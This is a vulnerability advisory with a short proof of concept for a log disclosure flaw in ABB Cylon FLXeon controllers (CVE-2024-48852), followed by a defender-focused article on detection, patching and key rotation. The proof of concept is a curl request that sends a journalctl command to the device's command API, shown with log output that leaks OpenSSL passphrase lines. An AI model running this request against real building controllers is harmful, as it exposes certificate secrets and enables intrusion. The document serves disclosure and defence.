ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure

Exploit Author: LiquidWorm Analysis Author: www.bubbleslearn.ir Category: Language: JavaScript Published Date: 2025-04-11

# Exploit Tiltle: ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb                   
# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)
                  CBX Series (FLX Series)
                  CBT Series
                  CBV Series
                  Firmware: <=9.3.4

Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a
series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™
building management solutions. ABB BACnet controllers are designed for intelligent
control of HVAC equipment such as central plant, boilers, chillers, cooling towers,
heat pump systems, air handling units (constant volume, variable air volume, and
multi-zone), rooftop units, electrical systems such as lighting control, variable
frequency drives and metering.

The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented
connectivity and open integration for your building automation systems. It's scalable,
and modular, allowing you to control a diverse range of HVAC functions.

Desc: An authenticated attacker can access sensitive information via the system logs
page of ABB Cylon FLXeon controllers. The logs expose critical data, including the
OpenSSL password for stored certificates. This information can be leveraged for further
attacks, such as decrypting encrypted communications, impersonation, or gaining deeper
system access.

Tested on: Linux Kernel 5.4.27
           Linux Kernel 4.15.13
           NodeJS/8.4.0
           Express


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5920
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5920.php
CVE ID: CVE-2024-48852
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48852


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░


$ curl -k "https://7.3.3.1/api/cmds" \ # JS > /diagnostics/logs-system (platform-dist)
> -H "Cookie: user_sid=xxx" \
> -d "{\"cmd\":\"journalctl -b -r --no-hostname ^| head -c 600000 \"}"

-- Logs begin at Thu 2024-06-13 10:58:03 EDT, end at Mon 2024-09-09 09:10:33 EDT. --
Feb 13 12:38:26 node[5810]:     at endReadableNT (_stream_readable.js:1059:12)
Feb 13 12:38:26 node[5810]:     at IncomingMessage.emit (events.js:207:7)
Feb 13 12:38:26 node[5810]:     at emitNone (events.js:105:13)
Feb 13 12:38:26 node[5810]:     at IncomingMessage.onEnd (/home/MIX_CMIX/node-server/node_modules/raw-body/index.js:273:7)
Feb 13 12:38:26 node[5810]:     at done (/home/MIX_CMIX/node-server/node_modules/raw-body/index.js:213:7)
Feb 13 12:38:26 node[5810]:     at invokeCallback (/home/MIX_CMIX/node-serve"}
...
...
Sep 09 09:10:33 node[5810]: cmd = openssl req -x509 -passin pass:c*******2 -key /usr/local/aam/node-server//certs/cbxi.key.pem -new -sha256 -out /usr/local/aam/node-server//certs/cbxi.cert.pem -subj  "/C=IE/ST=/L=Dublin/O=Cylon Controls/OU=/CN="
Sep 09 09:08:18 node[5810]: cmd = openssl req -x509 -passin pass:c*******2 -key /usr/local/aam/node-server//certs/cbxi.key.pem -new -sha256 -out /usr/local/aam/node-server//certs/cbxi.cert.pem -subj  "/C=IE/ST=/L=Dublin/O=Cylon Controls/OU=/CN="
Sep 09 09:00:12 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/aam/node-server/certs/cbxi.csr.pem'
Sep 09 08:59:58 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/aam/node-server/certs/cbxi.csr.pem'
Sep 09 08:59:41 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/
...
...

ABB Cylon FLXeon 9.3.4 — System Logs Information Disclosure (CVE-2024-48852)

This article examines a reported information-disclosure vulnerability in ABB Cylon FLXeon series controllers (firmware versions ≤ 9.3.4) that exposes sensitive data in system logs. It explains what was found, the impact to building management systems (BMS), detection techniques, mitigations and remediation, and long-term hardening recommendations for defenders and integrators.

Summary

ABB’s FLXeon/BACnet controllers are widely used in building automation to manage HVAC, lighting and other services. In firmware versions up to 9.3.4, application logs written to the system expose sensitive runtime commands and parameters — specifically OpenSSL command invocations that include passphrases used to protect private keys. An authenticated attacker with access to the device UI or API that returns system logs can obtain these secrets and use them to decrypt communications, impersonate services, or escalate further.

Affected products

FLXeon Series (FBXi, FBTi, FBVi)
CBX / FLX Series
CBT Series
CBV Series
Firmware: versions ≤ 9.3.4

Vulnerability overview

The root cause is sensitive data being written to server-side logs. Example sensitive items include OpenSSL invocations like “openssl req -x509 -passin pass:… -key … -out …”, which reveal passphrases protecting private keys. When logs are exposed through a web diagnostics endpoint or an authenticated API, these secrets become accessible to anyone allowed to read logs.

Why this is dangerous

Compromise of certificate passphrases can let an attacker extract private keys and decrypt TLS sessions or sign malicious traffic.
With private keys, attackers can impersonate controllers to other devices or management systems in the BMS network.
Logs can contain additional contextual information (file paths, filenames, usernames, stack traces) that facilitate privilege escalation and lateral movement.
Building automation networks often bridge to enterprise networks or remote management systems; exposing keys increases systemic risk.

Technical analysis (defender-focused, non-exploitative)

In vulnerable firmware builds, the backend node application logs full command strings used to (re)generate certificates and keys. These logs are then made available via a diagnostics/logs UI and via an API endpoint. The logs include lines similar to:

... cmd = openssl req -x509 -passin pass:c*******2 -key /usr/local/aam/node-server//certs/cbxi.key.pem -new -sha256 -out /usr/local/aam/node-server//certs/cbxi.cert.pem -subj "/C=IE/..."

In the original report, the password component was partly masked in disclosure examples, but the existence of plaintext (or easily recoverable) passphrases in logs is the core issue. The application’s logging level and string formatting leak the arguments passed into OpenSSL invocations.

Indicators of compromise / detection

Security teams can search device logs and management consoles for evidence of sensitive outputs. Useful detection steps include:

Search for OpenSSL invocations and “passin”/“passout” patterns in local logs or collected logs.
Look for repeated certificate creation commands, stack traces mentioning node.js modules (raw-body, stream_readable, etc.), and unexpected ERROR/ENOENT traces indicating misconfiguration.
Audit access logs to the diagnostics UI or API endpoints that serve logs. Check for unusual authenticated sessions or API calls from unexpected sources.

# Example defender-oriented search (run on a trusted management host collecting logs)
journalctl -u node -r | grep -iE 'openssl|passin|passout|certs/.*\.key'

Explanation: This command lists recent journal entries for the node service in reverse chronological order and filters for OpenSSL, passphrase-related options, or references to key files. It helps identify if argument-level secrets are present in logs. Only run searches on hosts you manage; do not use this to probe third-party systems you are not authorized to inspect.

Risk management and immediate mitigations

Prioritize the following steps for affected installations:

Apply vendor-supplied updates: check ABB support channels for patched firmware and upgrade to a version that removes sensitive logging (firmware > 9.3.4 or vendor-recommended release).
Restrict access to diagnostic pages and APIs: limit access by IP/network, require strong credentials, and enable multi-factor authentication where possible.
Rotate and revoke impacted certificates and keys: if a passphrase or private key may have been exposed, generate new keys and reissue certificates. Revoke the old certificate if supported by your PKI.
Audit and tighten logging: set application logging to omit sensitive command arguments and reduce verbosity on production devices.
Centralize logs securely: ship logs to a hardened log aggregator with strict access controls and retain audit trails off-device.

How to rotate a private key and reissue a certificate (defensive example)

# Generate a new 2048-bit RSA private key and CSR (run on a secure management host)
openssl genrsa -out new_device.key.pem 2048
openssl req -new -key new_device.key.pem -out new_device.csr.pem -subj "/C=XX/ST=/L=/O=/OU=/CN=device.example.local"

# Submit the CSR to your CA, obtain a signed certificate, then install the new key+certificate pair on the device following vendor instructions.

Explanation: These commands generate a new private key and a Certificate Signing Request (CSR). The CSR should be signed by your internal CA or a trusted CA. Replacing keys and certificates reduces the window of exposure if old passphrases were leaked.

Recommended long-term mitigations

Logging hygiene: developers and integrators should never log secrets (passwords, passphrases, private key contents). Use structured logs that allow exclusion of sensitive fields.
Principle of least privilege: ensure device web UI and debug interfaces are only accessible to authorized maintenance networks or VPNs.
Secure device lifecycle: enforce certificate rotation policies, automated provisioning with hardware-backed keys where possible (HSM or TPM).
Network segmentation: isolate BMS devices from general enterprise networks and internet-facing systems; use firewalls and ACLs.
Patch management: maintain an inventory of deployed devices and a schedule to apply vendor fixes and firmware updates.
Supply chain & vendor management: insist vendors follow secure-coding practices (no sensitive logging) and have timely coordinated disclosure and update processes.

Vendor guidance and disclosure

The vulnerability was publicly reported by a researcher and tracked as CVE-2024-48852. The original advisory and technical details are published by the researcher and vulnerability aggregator. Organizations should consult the vendor (ABB) security advisories and coordinate upgrades as provided by ABB support.

Reference	URL
ZeroScience Advisory (research disclosure)	https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5920.php
CVE Record	https://www.cve.org/CVERecord?id=CVE-2024-48852
ABB Global (vendor)	https://www.global.abb

Recommended detection rules for security monitoring (SIEM)

Alert on logs that contain command invocations referencing cert/key file paths (e.g., "/certs/*.key.pem").
Alert on patterns containing "passin pass:" or command-line passphrase markers in device logs.
Monitor for diagnostic API/endpoint access from non-administrator accounts or off-network origins.

Best practice checklist for integrators and operators

Inventory all ABB Cylon/FLXeon devices and firmware versions.
Check whether device logs are exposed through management UIs or APIs; restrict access immediately if possible.
Apply any vendor patches and validate in a test environment before production rollout.
Rotate any keys/certificates that may have been exposed. Revoke compromised certificates from your CA if supported.
Implement network segmentation and secure remote management (VPNs, jump hosts).
Update change-control and incident response playbooks to include BMS-specific scenarios.

Concluding expert notes

Information leakage through logs is a common but avoidable class of vulnerability. For critical infrastructure components like BMS controllers, the consequences go beyond a single device: leaked keys and credentials can enable persistent access across many systems. Immediate steps are to limit log exposure, rotate secrets, and deploy vendor patches. Long term, require vendors to follow secure logging guidelines and implement defense-in-depth for all management interfaces.